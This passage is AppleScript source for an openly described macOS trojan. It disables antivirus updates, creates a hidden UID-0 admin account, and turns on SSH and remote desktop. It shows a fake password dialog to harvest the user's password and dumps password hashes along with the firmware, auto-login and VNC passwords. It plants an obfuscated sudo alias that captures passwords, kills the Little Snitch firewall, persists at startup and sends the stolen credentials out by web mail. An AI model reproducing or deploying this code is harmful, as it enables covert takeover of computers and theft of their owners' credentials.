        do shell script "if [ -f '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' ]; then /usr/bin/sudo sed 's_://_://127.0.0.1/_'' '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' > /var/tmp/lu.tmp; /usr/bin/sudo mv /var/tmp/lu.tmp '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf'"
    end try
    --Still to do, newer NAV, Virex, etc.
    --Perhaps modify the /etc/hosts file
end there_are_no_osx_viruses_silly_wabbit

on i_like_you_just_as_you_are()
    --Disables update checking for the current user ~/Library/Preferences/com.apple.scheduler.plist
    if debug then log_event("i_like_you_just_as_you_are")
    do shell script "softwareupdate --schedule off 2>/dev/null; exit 0"
end i_like_you_just_as_you_are

on quit
    --ignore any user attempts to quit this program
    if debug then log_event("quit handler")
end quit

on agent_86_reporting_for_duty_chief()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("agent_86_reporting_for_duty_chief")
    set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'"
    if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
        try
            --see if our user is already there
            do shell script "dscl . -read /Users/" & hidden_admin_username
        on error number 71 -- "read invalid path"
            --if not, then add our user.
            do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash
        end try
    else --For Panther and prior
        try
            --see if our user is already there
            do shell script "niutil -readprop . /users/" & hidden_admin_username & " name"
        on error number 105 -- niutil can't open directory
            --if not, then add our user. niutil should use lowercase "/users/" or it will create a second one named "/Users/" which won't actually work.
            do shell script "/usr/bin/sudo niutil -create . /users/'" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' uid 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' gid 20; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' shell /bin/bash; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' passwd '" & hidden_admin_password_hash & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' _writers_passwd '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' expire 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' realname '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' change 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' class ''; /usr/bin/sudo niutil . -append /groups/admin users '" & hidden_admin_username & "'; /usr/bin/sudo niutil . -append /groups/wheel users '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' authentication_authority ';basic;'"
        end try
    end if
    
    --Also add our user to the hidden user list and set showotherusers_managed to false.
    try
        if (do shell script "defaults read /Library/Preferences/com.apple.loginwindow HiddenUsersList 2>/dev/null; exit 0") does not contain hidden_admin_username then
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow HiddenUsersList -array-add " & hidden_admin_username
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool false"
        end if
    end try
end agent_86_reporting_for_duty_chief

on papers_please()
    --Get current local IP addresses
    if debug then log_event("papers_please")
    set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")
    if be_quiet is false then
        --Outgoing communication will only happen if be_quiet is set to "false".
        if target_DDNS_username is not "" and target_DDNS_username is not "localhost" then
            try
                --If you are using a Dynamic DNS service to track the computer's public IP address, you may not need to fetch the public IP address separately as well
                do shell script "curl " & quoted form of target_DDNS_update_URL & " 2>&1 | grep success"
            on error error_message number error_number
                if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
                --Wanna try a different DDNS service?
            end try
        else
            try
                --These get the public IP address
                set ip_addresses to (do shell script "curl 'http://www.whatismyip.com/automation/n09230945.asp' 2>/dev/null") & " " & ip_addresses
            on error error_message number error_number
                if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
                set ip_addresses to (do shell script "curl http://ipid.shat.net/iponly/ | grep body | sed -e 's/^<body>//' -e 's/<.*$//'") & " " & ip_addresses
            end try
        end if
    end if
    set ip_addresses to do shell script "echo " & quoted form of ip_addresses & " | tr -s ' '"
end papers_please

on enable_ARD_and_VNC()
    --This *should* work from any admin account, without sudo or root, for any version of OS X which
    --includes ARD Client (server) such as 10.3, 10.4 and 10.5.
    if debug then log_event("enable_ARD_and_VNC")
    try
        -- Disable the Remote Management menu extra.
        do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
        if OSX_version_number_minor as number ≥ 5 then --For Leopard
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
            -- Allow access for all users and give all users full access.
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
            -- Start the Remote Management service.
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
        else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -all -restart -agent"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -restart -agent -console"
        end if
    end try
end enable_ARD_and_VNC

on enable_ssh()
    if debug then log_event("enable_ssh")
    try
        if i_am_an_admin then
            --This *should* work from any admin account, without sudo or root, for any version of OS X which
            --includes ARD Client (server) such as 10.3, 10.4 and 10.5.
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
            --And while I'm here...
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
        end if
    end try
    if i_have_root_access then
        try
            --If sudo works but I am not an admin (I might have modified /etc/sudoers)
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
            --And while I'm here...
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
        end try
        try
            --This handler needs root for everything past this point! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
            if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
                --Note, this also opens port 22 in the default OS X firewall
                do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist &"
            else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then --For Jaguar and Panther
                do shell script "/usr/bin/sudo mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.AStht && /usr/bin/sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh.AStht > /private/etc/xinetd.d/ssh && /usr/bin/sudo touch -r /private/etc/xinetd.d/ssh.AStht /private/etc/xinetd.d/ssh 2>/dev/null"
                do shell script "/usr/bin/sudo /sbin/service ssh start"
            else --For Puma and Cheetah
                --Still need to also open port 22 in the firewall (ipfw)!
                do shell script "/usr/bin/sudo sed -e 's/SSHSERVER=-NO-/SSHSERVER=-YES-/' /etc/hostconfig > /var/tmp/hostconfig && /usr/bin/sudo mv /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
                do shell script "grep 'SSHSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'SSHSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
                do shell script "/usr/bin/sudo /usr/sbin/sshd &"
            end if
        end try
    end if
end enable_ssh

on phone_home_and_try_a_different_method_if_it_fails()
    if debug then log_event("phone_home_and_try_a_different_method_if_it_fails")
    if be_quiet is false then
        --Outgoing communication will only happen if be_quiet is set to "false"
        --Be sure to use is_it_safe and/or these_are_not_the_outgoing_network_communications_you_are_looking_for() first!
        --The email will be sent to the address set in the variable masters_email_address !
        --HEY! You -MUST- change the lines below to work with the specific web mail form which you are using!
        --An easy way to see which method (POST as shown in this example, or GET) is used, and in what format
        --the data should be submitted, and what phrase indicates success, is to use Firefox and the LiveHTTPHeaders
        --extension while manually sending an email through the site's web mail form.
        if debug then log_event(quoted form of webmail_command_line)
        
        set the_message to my_username & "--" & my_password & "--" & ip_addresses & "--" & OSX_hashes
        set the_message to fuxor(the_message)
        set the_message to do shell script "echo " & quoted form of the_message & " | tr ' \\r\\n\\t' '+'"
        
        set webmail_command_line to do shell script "echo " & quoted form of webmail_command_line & " | sed -e 's/<<MASTERS_EMAIL_ADDRESS>>/" & masters_email_address & "/' -e 's/<<THE_TITLE>>/" & the_title & "/' -e 's/<<THE_MESSAGE>>/" & quoted form of the_message & "/' -e 's/<<SUCCESS_RESPONSE_TERM>>/" & webmail_success_response_term & "/' "
        
        try
            if (do shell script webmail_command_line) contains webmail_success_response_term then
                if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: message sent successfully")
            else
                if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: sending message failed")
            end if
        on error
            if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: error while sending message")
        end try
    end if
end phone_home_and_try_a_different_method_if_it_fails

on exit_stage_left()
    --This next if then statement will handle moving the trojan and putting 'original.app'
    --from within the trojan's app package back where the trojan had been
    if debug then log_event("exit_stage_left")
    if move_myself is not false then
        try
            do shell script "cd \"" & POSIX path of (my_POSIX_folder) & "\" ..; rm -Rf .AStht 2>/dev/null; mv -f \"" & POSIX path of (my_Path) & "\" .AStht; mv -f .AStht/Contents/original.app/ \"" & POSIX path of (my_Path) & "\"" --add; rm -Rf .AStht 2>/dev/null before the last quote to self-delete after moving
        end try
        try
            do shell script "/usr/bin/open \"" & POSIX path of (my_Path) & "\""
        end try
    end if
end exit_stage_left

on whos_in_charge_here()
    if debug then log_event("whos_in_charge_here")
    if text of (do shell script "id" user name my_username) contains "admin" then
        set i_am_an_admin to true
    else
        set i_am_an_admin to false
    end if
end whos_in_charge_here

on dupe_user()
    --Ask the user to supply a password
    if debug then log_event("dupe_user")
    local tries
    set the_title to "Sjsbenmr2Ukqnbr2mrlcvmra2gjcm2knaaejmq."
    set the_message to "A2pjmmckb2kmrsrmripr2svyr2una2orri2qrbrpbrq2niq2zcab2or2mrknvmrq.2Eibrm2gjcm
naaejmq2bj2pjibvicr:"
    set tries to 0
    if text of (do shell script "id" user name my_username) contains "admin" then
        set i_am_an_admin to true
        repeat until i_have_root_access
            set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" buttons {"OK"} default button "OK" with hidden answer)
            set tries to tries + 1
            try
                if text of (do shell script "echo $UID" user name my_username password my_password with administrator privileges) = "0" then set i_have_root_access to true
                do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
            on error error_message number error_number
                if tries is 4 then
                    display dialog "An authentication error has occurred. The file could not be repaired!" buttons {"OK"} default button "OK"
                    return
                end if
                set the_message to "Iipjmmrpb2knaaejmq.2Cyvpx2Ox2bj2bmg2ntnvi."
                display dialog defuxor(the_message) with title (defuxor(the_title)) buttons {"OK"} default button "OK"
            end try
        end repeat
    else
        set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" with hidden answer)
    end if
end dupe_user

on restart()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Tell the user that a restart is required.
    if debug then log_event("restart")
    set the_title to "Sjsbenmr2Ukqnbr"
    set the_message to "Tur2ckqnbr(a)2ermr2viabnyyrq2acppraascyyg.2Yjc2aujcyq2mrabnmb2gjcm2pjzkcbrm2ije."
    display dialog defuxor(the_message) with icon software_update_icon with title defuxor(the_title) buttons {"Restart"} default button "Restart"
    do shell script ("/usr/bin/sudo reboot")
end restart

on fuxor(the_variable)
    --Obfuscate some text
    if debug then log_event("fuxor")
    local the_variable
    return do shell script ("echo " & quoted form of the_variable & " | tr '" & key2 & "' '" & key1 & "'")
end fuxor

on defuxor(the_variable)
    --Deobfuscate some text
    if debug then log_event("defuxor")
    local the_variable
    return do shell script ("echo " & quoted form of the_variable & " | tr '" & key1 & "' '" & key2 & "'")
end defuxor

on just_hangin_out()
    --Keep checking until sudo works. Once called, the script will just sit here forever until sudo works or until it's quit.
    if debug then log_event("just_hangin_out")
    try
        do shell script "/usr/bin/sudo cat /etc/sudoers"
    on error error_message number error_number
        --if error_message is not "Password:" then return ?
        delay 290 -- wait 4 minutes and 50 seconds before trying again. The default sudo timeout is 5 minutes.
        just_hangin_out()
    end try
end just_hangin_out

on pass_the_hash()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("pass_the_hash")
    local kcpassword, NATpassword, ARDVNCpassword, autoLoginUser
    set kcpassword to ""
    set NATpassword to ""
    set ARDVNCpassword to ""
    set ofpassword to ""
    
    --This gets the password hashes for all OS X user accounts.
    try
        if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
            set OSX_hashes to do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat \"/var/db/shadow/hash/$the_hashfile\"`; ntlm_hash=\"${the_hash:0:64}\";[ \"${ntlm_hash}\" == \"${ntlm_hash/0000}\" ] && echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done"
        else if OSX_version_number_minor as number = 3 then --For Panther
            set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo \"${line}\";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null);sudo test -f /var/db/shadow/hash/${the_hashfile} && the_hash=$(sudo cat \"/var/db/shadow/hash/${the_hashfile}\");echo \"${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:\";echo \"${the_name}_SHA1:${the_hash:64:40}:\"; done"
        else --For Jaguar and prior
            set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo -n \"${line} \";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null); /usr/bin/sudo test -d /var/db/samba/hash && /usr/bin/sudo test -f /var/db/samba/hash/${the_hashfile} && /usr/bin/sudo cat \"/var/db/samba/hash/${the_hashfile}\" || echo;done"
        end if
    end try
    do shell script "echo " & quoted form of OSX_hashes & " >> " & quoted form of hashes_file
    
    --Get the Open Firmware password
    try
        set ofpassword to do shell script "IFS='%'; hexbytes=( $( /usr/bin/sudo nvram -p | grep password | cut -f 2 ) ); IFS='';for ((i=1;i<${#hexbytes[*]};i++)); do echo -en \"\\x$(printf '%x' $((16#AA^16#${hexbytes[$i]})))\";done;echo"
    end try
    if ofpassword is not "" then
        do shell script "echo " & quoted form of ofpassword & " >> " & quoted form of candidates_file
    end if
    
    --For the autologin password stored in /etc/kcpassword
    try
        set kcpassword to do shell script "declare -i offset=0 i=0;declare -a keys=(7d 89 52 23 d2 bc dd ea a3 b9 1f) hexbytes=($(sudo hexdump -v -e '/1 \"%02X \"' /etc/kcpassword));for ((offset=0;offset<${#hexbytes[*]};offset++));do newbyte=$(printf '%02X' $((16#${keys[${i}]}^16#${hexbytes[$offset]})));[ \"${newbyte}\" == \"00\" ]&&echo&&break;echo -en \"\\x${newbyte}\";let i+=1;[ $i -gt 10 ]&&let i=0;done"
        set autoLoginUser to do shell script "defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser"
    on error error_message number error_number
        if debug then log_event("kcpassword:ERROR #" & error_number & " " & error_message)
        --Either /etc/kcpassword doesn't exist (as in no autologin user is set),
        --or the password does not belong to this user (we could test it with the other usernames of this system),
        --or sudo failed and I could not read the /etc/kcpassword file,
        --or the account is not allowed to use sudo.
    end try
    if kcpassword is not "" then
        do shell script "echo " & quoted form of kcpassword & " >> " & quoted form of candidates_file
        if autoLoginUser is not "" then
            do shell script "echo '" & autoLoginUser & ":" & kcpassword & "' >> " & quoted form of accounts_file
        end if
    end if
    
    --For the ad-hoc WiFi network password which is stored as plain text.
    try
        set NATpassword to do shell script "defaults read /Library/Preferences/SystemConfiguration/com.apple.nat NAT | grep NetworkPassword | sed -e 's/^.*<//' -e 's/>.*$//'"
    end try
    if NATpassword is not "" then
        do shell script "echo " & quoted form of NATpassword & " >> " & quoted form of candidates_file
    end if
    
    --For the ARD VNC access password
    try
        --If /Library/Preferences/com.apple.VNCSettings.txt isn't there, create it with password 'a secret'
        try
            do shell script "[ ! -f /Library/Preferences/com.apple.VNCSettings.txt ] && echo -n '7614220BE8DAA096FF1C39567390ADCA' > /Library/Preferences/com.apple.VNCSettings.txt"
            set ARDVNCpassword to "a secret"
            return
        end try
        try
            set ARDVNCpassword to do shell script "declare -a keys=(17 34 51 6e 8b a8 c5 e2 ff 1c 39 56 73 90 ad ca);p=$(sudo cat /Library/Preferences/com.apple.VNCSettings.txt);hexbytes=(${p:0:2} ${p:2:2} ${p:4:2} ${p:6:2} ${p:8:2} ${p:10:2} ${p:12:2} ${p:14:2} ${p:16:2} ${p:18:2} ${p:20:2} ${p:22:2} ${p:24:2} ${p:26:2} ${p:28:2} ${p:30:2});for ((offset=0;offset<${#keys[*]};offset++));do echo -en \"\\x$(printf '%02X' $((16#${keys[${offset}]}^16#${hexbytes[$offset]})))\";done"
        end try
        if ARDVNCpassword is not "" then
            do shell script "echo " & quoted form of ARDVNCpassword & " >> " & quoted form of candidates_file
        end if
    end try
end pass_the_hash

on alias_sudo()
    --This routine creates a shell script named ".sudo2" and then aliases the sudo command to run the shell script.
    --The alias is also added to the user's .profile. Captured passwords are output to ~/Public/.howdy
    if debug then log_event("alias_sudo")
    do shell script "echo -e \"\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x0a\\x5b\\x20\\x22\\x78\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x3d\\x3d\\x20\\x22\\x78\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x31\\x3b\\x5b\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x6b\\x7d\\x22\\x20\\x2d\\x6f\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x4b\\x7d\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x5b\\x20\\x24\\x28\\x28\\x24\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x25\\x32\\x29\\x29\\x20\\x21\\x3d\\x20\\x30\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x65\\x63\\x68\\x6f\\x20\\x2d\\x6e\\x65\\x20\\x22\\x5c\\x78\\x35\\x30\\x5c\\x78\\x36\\x31\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x37\\x5c\\x78\\x36\\x66\\x5c\\x78\\x37\\x32\\x5c\\x78\\x36\\x34\\x5c\\x78\\x33\\x61\\x22\\x3b\\x73\\x74\\x74\\x79\\x20\\x2d\\x65\\x63\\x68\\x6f\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x72\\x65\\x61\\x64\\x20\\x70\\x61\\x73\\x73\\x3b\\x73\\x74\\x74\\x79\\x20\\x73\\x61\\x6e\\x65\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x24\\x7b\\x70\\x61\\x73\\x73\\x7d\\x20\\x22\\x20\\x3e\\x3e\\x20\\x7e\\x2f\\x50\\x75\\x62\\x6c\\x69\\x63\\x2f\\x2e\\x68\\x6f\\x77\\x64\\x79\\x3b\\x65\\x63\\x68\\x6f\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x53\\x6f\\x72\\x72\\x79\\x2c\\x20\\x74\\x72\\x79\\x20\\x61\\x67\\x61\\x69\\x6e\\x2e\\x22\\x3b\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x7
3\\x75\\x64\\x6f\\x20\\x2d\\x6b\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\" > ~/Library/.sudo2"
    try
        do shell script "grep 'alias sudo' ~/.profile"
    on error
        do shell script defuxor("puzjq2cjt+f2~/Lvomnmg/.acqj72;2nyvna2acqj=~/Lvomnmg/.acqj72;2rpuj2nyvna2acqj=~/Lvomnmg/.acqj72>>2~/.kmjsvyr")
    end try
end alias_sudo

on is_it_safe()
    --check if Little Snitch is running
    if debug then log_event("is_it_safe")
    try
        do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep"
        set be_quiet to true
        return
    end try
    set be_quiet to false
end is_it_safe

on these_are_not_the_outgoing_network_communications_you_are_looking_for()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Disable Little Snitch prior to using curl
    if debug then log_event("these_are_not_the_outgoing_network_communications_you_are_looking_for")
    try
        do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep | while read process and_junk; do /usr/bin/sudo kill -9 \"${process}\"; done; /usr/bin/sudo killall \"lsd\"; /usr/bin/sudo mv \"/Library/Little Snitch\" /Library/.hushnow"
        set be_quiet to false
    end try
end these_are_not_the_outgoing_network_communications_you_are_looking_for

on slash_x_hex(the_variable)
    if debug then log_event("slash_x_hex")
    local hex_characters, hexified_string, each_character, decimal_value, the_variable
    set hex_characters to "0123456789ABCDEF"
    set hexified_string to ""
    repeat with each_character in the_variable
        set decimal_value to ASCII number of each_character
        set hexified_string to hexified_string & (ASCII character 92) & "x" & character (decimal_value div 16 + 1) of hex_characters & character (decimal_value mod 16 + 1) of hex_characters
    end repeat
    return hexified_string
end slash_x_hex

on test_a_password_with_sudo(try_this_password)
    if debug then log_event("test_a_password_with_sudo")
    local try_this_password
    try
        --HEY! Note that this is going to invalidate the sudo timestamp!
        --If sudo was already working, do what you need sudo for BEFORE calling this!
        do shell script "/usr/bin/sudo -k; echo " & quoted form of try_this_password & " | /usr/bin/sudo -S id -u"
        if result is "0" then
            set i_am_an_admin to true
            set i_have_root_access to true
            do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
        end if
    end try
end test_a_password_with_sudo

on can_sudo_come_out_to_play()
    if debug then log_event("can_sudo_come_out_to_play")
    try
        do shell script "/usr/bin/sudo id -u" --should fail if sudo isn't within the timeout or return "0" if it worked
        set i_have_root_access to true
    on error error_message number error_number
        set i_have_root_access to false
    end try
end can_sudo_come_out_to_play

on move_in()
    --Test if I am running from /Library/Caches and if not, try to copy myself there (but only if I'm compiled)
    if debug then log_event("move_in")
    if my_POSIX_folder does not contain "/Library/Caches" and my_POSIX_folder is not "/Applications/AppleScript/" then
        try
            do shell script "ditto -X -rsrc " & quoted form of my_Path & " /Library/Caches/" & quoted form of my_name
            set launch_path to "/Library/Caches/" & my_name
            do shell script "chmod 777 /Library/Caches/" & quoted form of my_name
        on error error_message number error_number
            if debug then log_event("move_in:ERROR #" & error_number & " " & error_message)
            --Couldn't copy myself into /Library/Caches/
        end try
    end if
end move_in

on loosen_permissions_on_SystemLoginItems()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("loosen_permissions_on_SystemLoginItems")
    try
        do shell script "touch /Library/Preferences/com.apple.SystemLoginItems.plist"
    on error error_message number error_number
        do shell script "/usr/bin/sudo chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
    end try
end loosen_permissions_on_SystemLoginItems

on rerun_me_every_startup()
    --Test if my launch path is listed in /Library/Preferences/com.apple.SystemLoginItems.plist and if not, try to add it (but only if I'm compiled)
    if debug then log_event("rerun_me_every_startup")
    try
        set SystemLoginItems to do shell script "defaults read /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary"
    on error error_message number error_number
        if debug then log_event("rerun_me_every_startup:ERROR #" & error_number & " " & error_message)
        --can't read from /Library/Preferences/com.apple.SystemLoginItems.plist, perhaps it does not yet exist
    end try
    
    if SystemLoginItems does not contain launch_path and launch_path does not contain "Script Editor.app" then
        try
            do shell script "touch '/Library/Preferences/com.apple.SystemLoginItems.plist'"
            do shell script "defaults write /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
            do shell script "chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
        on error error_message number error_number
            --can't write to /Library/Preferences/com.apple.SystemLoginItems.plist, I'll add me to the user's login items instead.
